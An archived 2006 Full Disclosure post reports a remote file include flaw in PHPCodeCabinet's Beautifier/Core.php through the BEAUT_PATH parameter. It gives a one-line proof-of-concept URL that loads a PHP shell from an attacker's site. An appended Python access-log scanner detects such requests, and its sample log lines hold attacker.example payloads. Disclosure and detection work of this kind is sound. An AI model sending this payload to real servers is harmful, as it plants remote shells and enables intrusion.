Full Disclosure mailing list archives
PHPCodeCabinet Vulnerability
From: Minion <minionqb () gmail com>
Date: Fri, 4 Aug 2006 17:22:12 -0600
From Minion:
PHPCodeCabinet (all versions) is vulnerable to a remote file include. The vulnerable code is in /include/Beautifier/Core.php and $BEAUT_PATH was not properly scrubbed, so they got owned.

Proof of concept:

*target phpcodecabinet directory*/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php

HFile.php would be your PHP shell.

Shouts to XoRcrew & Disruptiv.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
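A log check for the request pattern in the advisory above, as an added example that is not part of the original post or of PHPCodeCabinet. It assumes combined-format web server access logs; the function names and the sample log lines are constructed for illustration, and treating any client-supplied BEAUT_PATH as suspicious is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path and parameter name are the ones named in the advisory.
SCRIPT_SUFFIX = "/include/beautifier/core.php"
PARAM = "BEAUT_PATH"
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A URL-style value (scheme://...) or a data: URI means a remote source.
REMOTE = re.compile(r"[a-z][a-z0-9+.\-]*://|data:", re.I)


def classify(target):
    """Return None, 'override' or 'remote-include' for one request target."""
    url = urlsplit(target)
    # Lower-case the path: Windows hosts serve it case-insensitively.
    if not unquote(url.path).lower().endswith(SCRIPT_SUFFIX):
        return None
    verdict = None
    # parse_qsl percent-decodes once, as PHP does before the script sees it.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key != PARAM:
            continue
        if REMOTE.match(value):
            return "remote-include"
        verdict = "override"  # assumption: clients never need to set it
    return verdict


def scan(lines):
    """Return (client, verdict) for every flagged access-log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        verdict = classify(m.group(2)) if m else None
        if verdict:
            hits.append((m.group(1), verdict))
    return hits


# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Aug/2006:17:30:01 -0600] "GET /cabinet/include/Beautifier/Core.php?BEAUT_PATH=http://attacker.example/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [04/Aug/2006:17:30:09 -0600] "GET /cabinet/include/Beautifier/Core.php?BEAUT_PATH=%68ttp%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 512',
    '198.51.100.4 - - [04/Aug/2006:17:31:40 -0600] "GET /cabinet/include/Beautifier/Core.php?BEAUT_PATH=lib HTTP/1.0" 200 0',
    '192.0.2.10 - - [04/Aug/2006:17:32:02 -0600] "GET /cabinet/index.php?page=BEAUT_PATH HTTP/1.1" 200 4096',
    '192.0.2.10 - - [04/Aug/2006:17:32:05 -0600] "GET /cabinet/include/Beautifier/Core.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

Only the query string is visible in an access log, so a BEAUT_PATH value sent in a POST body or cookie needs request-body or WAF logging to be seen.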